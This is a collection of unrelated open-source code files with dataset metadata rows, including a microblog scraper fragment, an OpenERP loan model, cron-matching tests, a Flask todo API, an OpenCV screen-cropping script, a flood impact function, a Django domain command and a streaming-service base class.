print('下载图片出错:' + url)
return filename
def analyze_pic(story):
filenames = []
if story.__contains__('class="picBox"'):
pattern = re.compile(r'<div class="picBox">\n<a href="(.*?)" data-like', re.S)
img_url = re.findall(pattern, story)[0]
print('图片:', img_url)
filename = download_pic(img_url, JPEG_EXTENSION)
filenames.append(filename)
elif story.__contains__('class="tl_imgGroup'):
pattern = re.compile(r'<div class="tl_imgGroup(.*?)<div class="miniMultiMedia clear"', re.S)
imgs_str = re.findall(pattern, story)[0]
pattern_img = re.compile(r'<a href="(.*?)" class="tl_imgGroup', re.S)
imgs = re.findall(pattern_img, imgs_str)
for img_url in imgs:
print('图片:', img_url)
filename = download_pic(img_url, JPEG_EXTENSION)
filenames.append(filename)
return filenames
def analyze_loc(story):
location_items = []
if story.__contains__('class="areaInfo"'):
pattern = re.compile(r'boss="btn_check_tweetNear".*?lat=(.*?)&lng=(.*?)&addr=(.*?)" target', re.S)
location_items = re.findall(pattern, story)[0]
print(u'位置:' + location_items[2])
print(u'经度:' + location_items[0])
print(u'纬度:' + location_items[1])
return location_items
def analyze_video(story):
video_items = []
if story.__contains__('class="videoBox"'):
pattern = re.compile(r'<div class="videoBox".*?realurl="(.*?)".*?reltitle="(.*?)".*?<img.*?crs="(.*?)"', re.S)
video_items = re.findall(pattern, story)[0]
print(u'视频名称:' + video_items[1])
print(u'视频网址:' + video_items[0])
print(u'视频封面:' + video_items[2])
try:
filename = download_pic(video_items[2], '.jpg')
except:
print(u'下载视频封面出错:' + video_items[2])
filename = None
video_items = list(video_items)
video_items.append(filename)
return video_items
def depart_quotation(story):
quotation_block = None
if story.__contains__('class="replyBox"'):
if story.__contains__('class="noMSource"'):#原文已被作者删除的情况
pattern = re.compile(r'(<div class="replyBox".*?<div class="noMSource".*?</div>.*?</div>)', re.S)
quotation_block = re.findall(pattern, story)[0]
else:
pattern = re.compile(r'(<div class="replyBox".*?<div class="msgBox".*?title=".*?" gender=' +
'.*?<div class="pubInfo.*?from="\\d*">.*?</a>.*?</div>.*?</div>)', re.S)
quotation_block = re.findall(pattern, story)[0]
story = story.replace(quotation_block, '')
return story, quotation_block
def analyze_quotation(quotation):
quotation_items = []
if quotation.__contains__('class="noMSource"'):
quotation_items = [u'原文已经被作者删除。']
return quotation_items
pattern = re.compile(r'<div class="msgCnt".*?title="(.*?)" gender=' +
'.*?<div>(.*?)</div>' +
'.*?<div class="pubInfo.*?from="\\d*">(.*?)</a>', re.S)
quotation_items = re.findall(pattern, quotation)[0]
print('原帖作者:', quotation_items[0])
print('原帖内容:', quotation_items[1])
print('原帖时间:', quotation_items[2])
return quotation_items
| apache-2.0 | -2,133,465,114,962,808,600 | 38.012739 | 118 | 0.580292 | false |
morrillo/hr_loans | hr.py | 1 | 1465 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class hr_loan(osv.osv):
_name = 'hr.loan'
_description = 'HR Loan'
_columns = {
'employee_id': fields.many2one('hr.employee','id','Employee ID'),
'loan_type': fields.selection((('P','Payment Advance'),
('L','Loan')),'Loan Type'),
'loan_date': fields.date('Loan Date'),
'comment': fields.text('Additional Information'),
}
hr_loan()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -1,966,382,299,273,435,600 | 37.552632 | 78 | 0.604778 | false |
kipe/pycron | tests/test_minute.py | 1 | 3235 | from datetime import datetime
import pycron
from pytz import utc
import pendulum
import arrow
import udatetime
from delorean import Delorean
def test_minute():
def run(now):
assert pycron.is_now('* * * * *', now)
assert pycron.is_now('9 * * * *', now)
assert pycron.is_now('*/1 * * * *', now)
assert pycron.is_now('*/3 * * * *', now)
assert pycron.is_now('*/9 * * * *', now)
assert pycron.is_now('3,9,25,16 * * * *', now)
assert pycron.is_now('*/2 * * * *', now) is False
assert pycron.is_now('*/4 * * * *', now) is False
assert pycron.is_now('*/5 * * * *', now) is False
assert pycron.is_now('*/12 * * * *', now) is False
assert pycron.is_now('3,25,16 * * * *', now) is False
assert pycron.is_now('0-10 * * * *', now)
assert pycron.is_now('0-10 0-10 * * *', now)
assert pycron.is_now('10-20 * * * *', now) is False
assert pycron.is_now('10-20 10-20 * * *', now) is False
assert pycron.is_now('1,2,5-10 * * * *', now)
assert pycron.is_now('9,5-8 * * * *', now)
assert pycron.is_now('10,20-30 * * * *', now) is False
# Issue 14
assert pycron.is_now('1-59/2 * * * *', now) is True
assert pycron.is_now('1-59/4 * * * *', now) is True
assert pycron.is_now('1-59/8 * * * *', now) is True
now = datetime(2015, 6, 18, 0, 9)
run(now)
run(now.replace(tzinfo=utc))
run(pendulum.instance(now))
run(arrow.get(now))
run(udatetime.from_string(now.isoformat()))
run(Delorean(datetime=now, timezone='UTC').datetime)
def test_last_minute():
def run(now):
assert pycron.is_now('* * * * *', now)
assert pycron.is_now('59 * * * *', now)
assert pycron.is_now('*/1 * * * *', now)
# Issue 14
assert pycron.is_now('1-59/2 * * * *', now) is True
now = datetime(2015, 6, 18, 0, 59)
run(now)
run(now.replace(tzinfo=utc))
run(pendulum.instance(now))
run(arrow.get(now))
run(udatetime.from_string(now.isoformat()))
run(Delorean(datetime=now, timezone='UTC').datetime)
def test_minute_ranges():
for i in range(1, 59, 2):
now = datetime(2015, 6, 18, 0, i)
assert pycron.is_now('1-59/2 * * * *', now)
assert pycron.is_now('1-59/2 * * * *', now.replace(tzinfo=utc))
assert pycron.is_now('1-59/2 * * * *', pendulum.instance(now))
assert pycron.is_now('1-59/2 * * * *', arrow.get(now))
assert pycron.is_now('1-59/2 * * * *', udatetime.from_string(now.isoformat()))
assert pycron.is_now('1-59/2 * * * *', Delorean(datetime=now, timezone='UTC').datetime)
for i in range(0, 59, 2):
now = datetime(2015, 6, 18, 0, i)
assert pycron.is_now('1-59/2 * * * *', now) is False
assert pycron.is_now('1-59/2 * * * *', now.replace(tzinfo=utc)) is False
assert pycron.is_now('1-59/2 * * * *', pendulum.instance(now)) is False
assert pycron.is_now('1-59/2 * * * *', arrow.get(now)) is False
assert pycron.is_now('1-59/2 * * * *', udatetime.from_string(now.isoformat())) is False
assert pycron.is_now('1-59/2 * * * *', Delorean(datetime=now, timezone='UTC').datetime) is False
| mit | 4,184,455,455,338,272,000 | 39.949367 | 104 | 0.550541 | false |
chrisng93/todo-app | server/app/api/lists.py | 1 | 1669 | from flask import Blueprint, request, jsonify
from sqlalchemy.exc import IntegrityError
from ..models.List import List
from ..extensions import db
list_api = Blueprint('list', __name__, url_prefix='/api/list')
@list_api.route('/', methods=['GET'])
def get_lists():
lists = List.query
return jsonify({'lists': [todo_list.to_json() for todo_list in lists]})
@list_api.route('/<int:id>', methods=['GET'])
def get_list(id):
todo_list = List.query.get_or_404(id)
return jsonify({'list': todo_list.to_json()})
@list_api.route('/', methods=['POST'])
def create_list():
try:
todo_list = List().from_json(request.json)
db.session.add(todo_list)
db.session.commit()
return jsonify({'list': todo_list.to_json()}), 201
except IntegrityError as e:
return jsonify({'message': str(e)}), 400
@list_api.route('/<int:id>', methods=['PUT'])
def update_list(id):
try:
todo_list = List.query.get_or_404(id)
todo_list.from_json(request.json)
db.session.add(todo_list)
db.session.commit()
return jsonify({'list': todo_list.to_json()})
except IntegrityError as e:
return jsonify({'message': str(e)}), 400
@list_api.route('/<int:id>', methods=['DELETE'])
def delete_list(id):
todo_list = List.query.get_or_404(id)
db.session.delete(todo_list)
db.session.commit()
return jsonify({})
@list_api.route('/<int:id>/complete', methods=['PUT'])
def mark_all_complete(id):
todo_list = List.query.get_or_404(id)
todo_list.mark_all_complete()
db.session.add(todo_list)
db.session.commit()
return jsonify({'list': todo_list.to_json()})
| mit | 5,324,590,652,803,928,000 | 27.288136 | 75 | 0.630917 | false |
meizhoubao/pyimagesearch | Pokedex/find_screen.py | 1 | 2248 | from pyimagesearch import imutils
from skimage import exposure
import numpy as np
import argparse
import cv2
ap = argparse.ArgumentParser()
ap.add_argument("-q", "--query", required=True,
help = "Path to the query image")
args = vars(ap.parse_args())
image = cv2.imread(args["query"])
ratio = image.shape[0] / 300.0
orig = image.copy()
image = imutils.resize(image, height = 300)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
gray = cv2.bilateralFilter(gray, 11, 17, 17)
edged = cv2.Canny(gray, 30, 200)
(cnts, _) = cv2.findContours(edged.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
cnts = sorted(cnts, key=cv2.contourArea, reverse=True)[:10]
screenCnt = None
for c in cnts:
peri = cv2.arcLength(c, True)
approx = cv2.approxPolyDP(c, 0.02 * peri, True)
if len(approx) == 4:
screenCnt = approx
break
# cv2.drawContours(image, [ScreenCnt], -1, (0, 255, 0), 3)
# cv2.imshow("Game Boy Screen", image)
# cv2.waitKey(0)
pts = screenCnt.reshape(4, 2)
rect = np.zeros((4,2), dtype = "float32")
s = pts.sum(axis=1)
rect[0] = pts[np.argmin(s)]
rect[2] = pts[np.argmax(s)]
diff = np.diff(pts, axis=1)
rect[1] = pts[np.argmin(diff)]
rect[3] = pts[np.argmax(diff)]
rect *= ratio
(tl, tr, br, bl) = rect
widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))
widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))
heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))
heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))
maxWidth = max(int(widthA), int(widthB))
maxHeight = max(int(heightA), int(heightB))
dst = np.array([
[0,0],
[maxWidth - 1, 0],
[maxWidth - 1, maxHeight - 1],
[0, maxHeight - 1]
], dtype = "float32")
M = cv2.getPerspectiveTransform(rect, dst)
wrap = cv2.warpPerspective(orig, M, (maxWidth, maxHeight))
wrap = cv2.cvtColor(wrap, cv2.COLOR_BGR2GRAY)
wrap = exposure.rescale_intensity(wrap, out_range = (0, 255))
(h, w) = wrap.shape
(dX, dY) = (int(w * 0.4), int(h * 0.4))
crop = wrap[10:dY, w - dX:w - 10]
cv2.imwrite("cropped.png", crop)
cv2.imshow("image", image)
cv2.imshow("edge", edged)
cv2.imshow("wrap", imutils.resize(wrap, height = 300))
cv2.imshow("crop", imutils.resize(crop, height = 300))
cv2.waitKey(0)
| gpl-3.0 | -7,678,565,435,378,642,000 | 27.455696 | 82 | 0.626335 | false |
jeremy-c/unusualbusiness | unusualbusiness/articles/models.py | 1 | 13076 | from __future__ import unicode_literals
from django.db import models
from django.db.models import Model
from django.utils import timezone
from django.utils.translation import ugettext as _
from modelcluster.fields import ParentalKey
from taggit.models import TaggedItemBase, CommonGenericTaggedItemBase, GenericUUIDTaggedItemBase, Tag
from wagtail.wagtailadmin.edit_handlers import FieldPanel, InlinePanel, PageChooserPanel, StreamFieldPanel
from wagtail.wagtailcore import blocks
from wagtail.wagtailcore.fields import StreamField
from wagtail.wagtailcore.models import Page, Orderable
from wagtail.wagtailembeds.blocks import EmbedBlock
from wagtail.wagtailimages.blocks import ImageChooserBlock
from wagtail.wagtailimages.edit_handlers import ImageChooserPanel
from wagtail.wagtailsearch import index
from unusualbusiness.events.models import EventPage
from unusualbusiness.organizations.models import OrganizationPage
from unusualbusiness.utils.models import PageFormat, RenderInlineMixin, RelatedHowToMixin, FeaturedImageBlock, \
FeaturedVideoBlock, FeaturedAudioBlock, PullQuoteBlock
class TheoryArticleIndexPage(Page):
parent_page_types = ['pages.HomePage']
subpage_types = ['articles.TheoryArticlePage']
def get_context(self, request):
context = super(TheoryArticleIndexPage, self).get_context(request)
# Add extra variables and return the updated context
context['theory_articles'] = TheoryArticlePage.objects.all().live().order_by('-publication_date')
context['parent'] = self.get_parent().specific
return context
class StoryArticleIndexPage(Page):
parent_page_types = ['pages.HomePage']
subpage_types = ['articles.StoryArticlePage']
def get_context(self, request):
context = super(StoryArticleIndexPage, self).get_context(request)
# Add extra variables and return the updated context
context['story_articles'] = StoryArticlePage.objects.all().live().order_by('-publication_date')
return context
class ActivityIndexPage(Page):
parent_page_types = ['pages.HomePage']
subpage_types = ['events.EventPage', 'articles.NewsArticlePage', ]
@staticmethod
def featured_articles():
event_list = EventPage.objects.live().filter(is_featured=True)
return sorted(event_list,
key=lambda instance: instance.first_published_at,
reverse=True)
def get_context(self, request):
context = super(ActivityIndexPage, self).get_context(request)
context['events'] = EventPage.objects.live().order_by('start_date')
context['initial_slide'] = EventPage.objects.live().count() - 1
context['news_articles'] = NewsArticlePage.objects.child_of(self).live().order_by('-publication_date')
return context
class AbstractArticle(models.Model, RenderInlineMixin):
is_featured = models.BooleanField(
verbose_name = _("Is Featured on home page"),
default=False
)
subtitle = models.CharField(
verbose_name=_('subtitle'),
max_length=255,
help_text=_("The subtitle of the page"),
blank=True
)
featured = StreamField([
('featured_image', FeaturedImageBlock()),
('featured_video', FeaturedVideoBlock()),
('featured_audio', FeaturedAudioBlock()),
])
author = models.ForeignKey(
'articles.AuthorPage',
verbose_name=_('author'),
null=True,
blank=True,
on_delete=models.SET_NULL,
related_name='+'
)
publication_date = models.DateField(
verbose_name=_('publication_date'),
help_text=_("The publication date of the article"),
default=timezone.now,
blank=True,
null=True,
)
body = StreamField([
('introduction', blocks.TextBlock(icon="italic", rows=3)),
('paragraph', blocks.RichTextBlock(icon="pilcrow")),
# ('markdown_paragraph', MarkdownBlock(icon="code")),
('image', ImageChooserBlock(icon="image")),
('pullquote', PullQuoteBlock()),
])
class Meta:
abstract = True
verbose_name = _("Article")
def __featured_item(self, block_type='featured_image'):
for stream_child in self.featured:
if stream_child.block_type == block_type:
return stream_child
return None
@property
def featured_image(self):
return self.__featured_item('featured_image')
@property
def featured_audio(self):
return self.__featured_item('featured_audio')
@property
def featured_video(self):
return self.__featured_item('featured_video')
@property
def introduction(self):
for stream_child in self.body:
if stream_child.block_type == 'introduction':
return stream_child.value
return None
class StoryArticlePage(Page, AbstractArticle, RelatedHowToMixin):
parent_page_types = ['articles.StoryArticleIndexPage']
subpage_types = []
format = models.CharField(
verbose_name=_('page_format'),
max_length=32,
null=False,
default='text',
choices=(PageFormat.TEXT,
PageFormat.AUDIO,
PageFormat.VIDEO,
PageFormat.IMAGES, ))
class Meta:
verbose_name = _("Story")
verbose_name_plural = _("Stories")
def related_organizations(self):
return [related_organization.organization_page
for related_organization
in self.organizations.select_related().all()]
def get_context(self, request):
context = super(StoryArticlePage, self).get_context(request)
related_how_tos = self.related_how_tos()
context['related_how_tos'] = related_how_tos
context['upcoming_related_event'] = self.upcoming_related_event(related_how_tos)
context['related_how_tos_with_articles'] = self.related_how_to_story_articles(related_how_tos, self.id)
context['parent'] = self.get_parent().specific
return context
StoryArticlePage.content_panels = Page.content_panels + [
FieldPanel('is_featured'),
FieldPanel('subtitle'),
PageChooserPanel('author', page_type='articles.AuthorPage'),
FieldPanel('format'),
FieldPanel('publication_date'),
StreamFieldPanel('featured'),
StreamFieldPanel('body'),
InlinePanel('organizations', label=_("Organizations")),
]
StoryArticlePage.promote_panels = Page.promote_panels
StoryArticlePage.search_fields = Page.search_fields + [
index.SearchField('title_en'),
index.SearchField('title_nl'),
index.SearchField('subtitle_en'),
index.SearchField('subtitle_nl'),
index.SearchField('body_en'),
index.SearchField('body_nl'),
index.RelatedFields('organizations', [
index.SearchField('title'),
]),
index.RelatedFields('how_to_page', [
index.SearchField('title'),
]),
index.RelatedFields('author', [
index.SearchField('title'),
]),
]
class StoryArticlePageOrganization(Orderable, models.Model):
story_article_page = ParentalKey('articles.StoryArticlePage', related_name='organizations')
organization_page = models.ForeignKey(
'organizations.OrganizationPage',
null=True,
blank=True,
on_delete=models.SET_NULL,
related_name='story_article_page'
)
panels = [
PageChooserPanel('organization_page'),
]
def __str__(self): # __unicode__ on Python 2
return self.story_article_page.title + " -> " + self.organization_page.title
class TheoryArticlePage(Page, AbstractArticle, RelatedHowToMixin):
ajax_template = 'articles/blocks/inline_theory_article.html'
parent_page_types = ['articles.TheoryArticleIndexPage']
subpage_types = []
format = models.CharField(
verbose_name=_('page_format'),
max_length=32,
null=False,
default='theory',
choices=(PageFormat.THEORY,
PageFormat.AUDIO,
PageFormat.VIDEO,
PageFormat.LINK,
PageFormat.DOCUMENT, ))
class Meta:
verbose_name = _("Theory")
verbose_name_plural = _("Theories")
def get_context(self, request):
context = super(TheoryArticlePage, self).get_context(request)
related_how_tos = self.related_how_tos()
context['related_how_tos'] = related_how_tos
context['upcoming_related_event'] = self.upcoming_related_event(related_how_tos)
context['related_how_tos_with_articles'] = self.related_how_to_theory_articles(related_how_tos, self.id)
context['parent'] = self.get_parent().specific
return context
TheoryArticlePage.content_panels = Page.content_panels + [
FieldPanel('is_featured'),
FieldPanel('subtitle'),
PageChooserPanel('author', page_type='articles.AuthorPage'),
FieldPanel('format'),
StreamFieldPanel('featured'),
FieldPanel('publication_date'),
StreamFieldPanel('body'),
]
TheoryArticlePage.promote_panels = Page.promote_panels
TheoryArticlePage.search_fields = Page.search_fields + [
index.SearchField('title_en'),
index.SearchField('title_nl'),
index.SearchField('subtitle_en'),
index.SearchField('subtitle_nl'),
index.SearchField('body_en'),
index.SearchField('body_nl'),
index.RelatedFields('how_to_page', [
index.SearchField('title'),
]),
index.RelatedFields('author', [
index.SearchField('title'),
]),
]
class NewsArticlePage(Page, AbstractArticle, RelatedHowToMixin):
event_page = models.ForeignKey(
'events.EventPage',
null=True,
blank=True,
on_delete=models.SET_NULL,
related_name='news_article_page'
)
format = models.CharField(
verbose_name=_('page_format'),
max_length=32,
null=False,
default='event',
choices=(PageFormat.EVENT,
PageFormat.IMAGES,
PageFormat.AUDIO,
PageFormat.VIDEO, ))
parent_page_types = ['events.EventPage', 'articles.ActivityIndexPage']
subpage_types = []
class Meta:
verbose_name = _("News or report article")
verbose_name_plural = _("News or report articles")
def get_context(self, request):
context = super(NewsArticlePage, self).get_context(request)
related_how_tos = self.related_how_tos()
context['related_how_tos'] = related_how_tos
context['upcoming_related_event'] = self.upcoming_related_event(related_how_tos)
context['related_how_tos_with_articles'] = self.related_how_to_news_articles(related_how_tos, self.id)
context['parent'] = self.get_parent().specific
return context
NewsArticlePage.content_panels = Page.content_panels + [
FieldPanel('is_featured'),
PageChooserPanel('event_page', page_type='events.EventPage'),
FieldPanel('subtitle'),
PageChooserPanel('author', page_type='articles.AuthorPage'),
FieldPanel('format'),
StreamFieldPanel('featured'),
FieldPanel('publication_date'),
StreamFieldPanel('body'),
]
NewsArticlePage.promote_panels = Page.promote_panels
NewsArticlePage.search_fields = Page.search_fields + [
index.SearchField('title_en'),
index.SearchField('title_nl'),
index.SearchField('subtitle_en'),
index.SearchField('subtitle_nl'),
index.SearchField('body_en'),
index.SearchField('body_nl'),
index.RelatedFields('event_page', [
index.SearchField('title'),
]),
index.RelatedFields('author', [
index.SearchField('title'),
]),
]
class AuthorPage(Page):
photo = models.ForeignKey(
'wagtailimages.Image',
verbose_name=_('photo'),
null=True,
blank=True,
on_delete=models.SET_NULL,
related_name='+'
)
biography = models.TextField(
verbose_name=_('biography'),
help_text=_("The biography of the author (max. 150 woorden)"),
blank=True
)
parent_page_types = ['articles.AuthorIndexPage']
subpage_types = []
class Meta:
verbose_name = _("Author")
verbose_name_plural = _("Authors")
AuthorPage.content_panels = Page.content_panels + [
FieldPanel('biography'),
ImageChooserPanel('photo'),
]
AuthorPage.promote_panels = Page.promote_panels
class AuthorIndexPage(Page):
parent_page_types = ['pages.HomePage']
subpage_types = ['articles.AuthorPage']
def get_context(self, request):
context = super(AuthorIndexPage, self).get_context(request)
# Add extra variables and return the updated context
context['authors'] = AuthorPage.objects.all().live()
context['parent'] = self.get_parent().specific
return context
| bsd-3-clause | 738,842,656,338,968,400 | 32.875648 | 112 | 0.643698 | false |
Samweli/inasafe | safe/impact_functions/inundation/flood_raster_population/impact_function.py | 1 | 8986 | # coding=utf-8
"""InaSAFE Disaster risk tool by Australian Aid - Flood Raster Impact Function
on Population.
Contact : [email protected]
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Rizky Maulana Nugraha'
import logging
import numpy
from safe.impact_functions.core import (
population_rounding,
has_no_data)
from safe.impact_functions.impact_function_manager \
import ImpactFunctionManager
from safe.impact_functions.inundation.flood_raster_population\
.metadata_definitions import FloodEvacuationRasterHazardMetadata
from safe.impact_functions.bases.continuous_rh_continuous_re import \
ContinuousRHContinuousRE
from safe.utilities.i18n import tr
from safe.impact_functions.core import no_population_impact_message
from safe.common.exceptions import ZeroImpactException
from safe.storage.raster import Raster
from safe.common.utilities import (
format_int,
create_classes,
humanize_class,
create_label,
verify)
from safe.gui.tools.minimum_needs.needs_profile import add_needs_parameters, \
get_needs_provenance_value
from safe.impact_reports.population_exposure_report_mixin import \
PopulationExposureReportMixin
from safe.definitions import no_data_warning
import safe.messaging as m
LOGGER = logging.getLogger('InaSAFE')
class FloodEvacuationRasterHazardFunction(
ContinuousRHContinuousRE,
PopulationExposureReportMixin):
# noinspection PyUnresolvedReferences
"""Risk plugin for flood population evacuation."""
_metadata = FloodEvacuationRasterHazardMetadata()
def __init__(self):
"""Constructor."""
super(FloodEvacuationRasterHazardFunction, self).__init__()
PopulationExposureReportMixin.__init__(self)
self.impact_function_manager = ImpactFunctionManager()
# AG: Use the proper minimum needs, update the parameters
self.parameters = add_needs_parameters(self.parameters)
# Initialize instance attributes for readability (pylint)
self.no_data_warning = False
def notes(self):
"""Return the notes section of the report.
:return: The notes that should be attached to this impact report.
:rtype: list
"""
population = format_int(population_rounding(self.total_population))
thresholds = self.parameters['thresholds'].value
if get_needs_provenance_value(self.parameters) is None:
needs_provenance = ''
else:
needs_provenance = tr(get_needs_provenance_value(self.parameters))
fields = [
tr('Total population in the analysis area: %s') % population,
tr('<sup>1</sup>People need evacuation if flood levels exceed '
'%(eps).1f m.') % {'eps': thresholds[-1]},
needs_provenance,
]
if self.no_data_warning:
fields = fields + no_data_warning
# include any generic exposure specific notes from definitions.py
fields = fields + self.exposure_notes()
# include any generic hazard specific notes from definitions.py
fields = fields + self.hazard_notes()
return fields
def _tabulate_zero_impact(self):
thresholds = self.parameters['thresholds'].value
message = m.Message()
table = m.Table(
style_class='table table-condensed table-striped')
row = m.Row()
label = m.ImportantText(
tr('People in %.1f m of water') % thresholds[-1])
content = '%s' % format_int(self.total_evacuated)
row.add(m.Cell(label))
row.add(m.Cell(content))
table.add(row)
table.caption = self.question
message.add(table)
message = message.to_html(suppress_newlines=True)
return message
def run(self):
"""Risk plugin for flood population evacuation.
Counts number of people exposed to flood levels exceeding
specified threshold.
:returns: Map of population exposed to flood levels exceeding the
threshold. Table with number of people evacuated and supplies
required.
:rtype: tuple
"""
# Determine depths above which people are regarded affected [m]
# Use thresholds from inundation layer if specified
thresholds = self.parameters['thresholds'].value
verify(
isinstance(thresholds, list),
'Expected thresholds to be a list. Got %s' % str(thresholds))
# Extract data as numeric arrays
data = self.hazard.layer.get_data(nan=True) # Depth
if has_no_data(data):
self.no_data_warning = True
# Calculate impact as population exposed to depths > max threshold
population = self.exposure.layer.get_data(nan=True, scaling=True)
total = int(numpy.nansum(population))
if has_no_data(population):
self.no_data_warning = True
# merely initialize
impact = None
for i, lo in enumerate(thresholds):
if i == len(thresholds) - 1:
# The last threshold
thresholds_name = tr(
'People in >= %.1f m of water') % lo
self.impact_category_ordering.append(thresholds_name)
self._evacuation_category = thresholds_name
impact = medium = numpy.where(data >= lo, population, 0)
else:
# Intermediate thresholds
hi = thresholds[i + 1]
thresholds_name = tr(
'People in %.1f m to %.1f m of water' % (lo, hi))
self.impact_category_ordering.append(thresholds_name)
medium = numpy.where((data >= lo) * (data < hi), population, 0)
# Count
val = int(numpy.nansum(medium))
self.affected_population[thresholds_name] = val
# Put the deepest area in top #2385
self.impact_category_ordering.reverse()
self.total_population = total
self.unaffected_population = total - self.total_affected_population
# Carry the no data values forward to the impact layer.
impact = numpy.where(numpy.isnan(population), numpy.nan, impact)
impact = numpy.where(numpy.isnan(data), numpy.nan, impact)
# Count totals
evacuated = self.total_evacuated
self.minimum_needs = [
parameter.serialize() for parameter in
self.parameters['minimum needs']
]
total_needs = self.total_needs
# check for zero impact
if numpy.nanmax(impact) == 0 == numpy.nanmin(impact):
message = no_population_impact_message(self.question)
raise ZeroImpactException(message)
# Create style
colours = [
'#FFFFFF', '#38A800', '#79C900', '#CEED00',
'#FFCC00', '#FF6600', '#FF0000', '#7A0000']
classes = create_classes(impact.flat[:], len(colours))
interval_classes = humanize_class(classes)
style_classes = []
for i in xrange(len(colours)):
style_class = dict()
if i == 1:
label = create_label(interval_classes[i], 'Low')
elif i == 4:
label = create_label(interval_classes[i], 'Medium')
elif i == 7:
label = create_label(interval_classes[i], 'High')
else:
label = create_label(interval_classes[i])
style_class['label'] = label
style_class['quantity'] = classes[i]
style_class['transparency'] = 0
style_class['colour'] = colours[i]
style_classes.append(style_class)
style_info = dict(
target_field=None,
style_classes=style_classes,
style_type='rasterStyle')
impact_data = self.generate_data()
extra_keywords = {
'map_title': self.map_title(),
'legend_notes': self.metadata().key('legend_notes'),
'legend_units': self.metadata().key('legend_units'),
'legend_title': self.metadata().key('legend_title'),
'evacuated': evacuated,
'total_needs': total_needs
}
impact_layer_keywords = self.generate_impact_keywords(extra_keywords)
# Create raster object and return
impact_layer = Raster(
impact,
projection=self.hazard.layer.get_projection(),
geotransform=self.hazard.layer.get_geotransform(),
name=self.metadata().key('layer_name'),
keywords=impact_layer_keywords,
style_info=style_info)
impact_layer.impact_data = impact_data
self._impact = impact_layer
return impact_layer
| gpl-3.0 | -2,536,155,877,016,420,000 | 35.677551 | 79 | 0.620632 | false |
Inboxen/Inboxen | inboxen/management/commands/createdomain.py | 1 | 1395 | ##
# Copyright (C) 2018 Jessica Tallon & Matt Molyneaux
#
# This file is part of Inboxen.
#
# Inboxen is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Inboxen is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Inboxen. If not, see <http://www.gnu.org/licenses/>.
##
from django.core.management.base import BaseCommand, CommandError
from django.db import IntegrityError
from inboxen.models import Domain
class Command(BaseCommand):
help = "Create a domain"
def add_arguments(self, parser):
parser.add_argument("domain", help="domain to be created")
def handle(self, **options):
domain = options["domain"]
try:
Domain.objects.create(domain=domain)
except IntegrityError:
raise CommandError("Domain already exists.")
else:
self.stdout.write("%s created!\n" % domain)
self.stdout.flush()
| agpl-3.0 | 7,878,014,791,629,743,000 | 33.875 | 80 | 0.688172 | false |
Joev-/Streaman | streaman/stream.py | 1 | 3561 | """
streaman.stream
---------------
Provides the base `Stream` and `Channel` classes which must be overridden by
implemented services.
"""
import time
import os
try:
import cPickle as pickle
except ImportError:
import pickle
from types import MethodType
from streaman.common import *
class Stream(object):
""" A raw `Stream` object. Stores a Name, URI and Service ID for a stream. """
def __init__(self, service, name, uri, url):
self.service = service
self.name = name
self.uri = uri
self.url = url
self.status = STATUS_OFFLINE
self.last_update = int(time.time())
def __repr__(self):
return "<Stream: ({0}) {1}>".format(SERVICE_NAME[self.service], self.name)
def __getstate__(self):
"""
Overriden for pickling purposes. Only the attributes
of the underlying `Stream` class need to be pickled.
"""
to_pickle = ["service", "name", "uri", "url"]
d = dict()
for k, v in self.__dict__.items():
if k in to_pickle:
d[k]=v
return d
def __setstate__(self, d):
"""
Overriden for pickling purposes.
Initialises null values for attributes that should exist.
"""
d["channel"] = None
d["status"] = STATUS_OFFLINE
d["last_update"] = 0
# Most streams will have some sort of game attribute.
d["game"] = ""
self.__dict__.update(d)
def update(self, updateModel, index):
"""
This method should be used to update the Stream with new data.
At the least it informs the model that the data at the given index
has been updated. The updateModel method is a method inside the
Model class, usually `notify_stream_updated`
"""
updateModel(index)
self.last_update = int(time.time())
@staticmethod
def generate_uri(stream_name):
"""
Takes a stream name and returns a URI.
Must be overridden and implemented for each streaming service.
"""
raise NotImplementedError("Method must be overridden")
@staticmethod
def generate_url(stream_name):
"""
Takes a stream name and returns a URL.
Must be overridden and implemented for each streaming service.
A URL differs from a URI in that it is the hyperlink to the stream web page.
This will be used when user's click on the "View on [service]" button.
"""
raise NotImplementedError("Method must be overridden")
@staticmethod
def is_valid(stream_uri):
"""
Ensures a `Stream` is valid on the service.
Must be overridden and implemented correctly for each streaming service.
"""
raise NotImplementedError("Method must be overridden")
def get_icon(self):
""" Returns a valid resource URI for to an icon. Must be overridden."""
raise NotImplementedError("Method must be overridden")
@property
def online(self):
return self.status
def update_status(self, status):
self.status = status
def check_status(self):
""" Uses `self.uri` to check the status of the stream. """
pass
class Channel(object):
""" Most streams will contain a `Channel` with more information. """
def __init__(self):
self.name = ""
self.display_name = ""
self.banner = ""
self.logo = ""
def __repr__(self):
return "<Channel: {0}>".format(self.name)
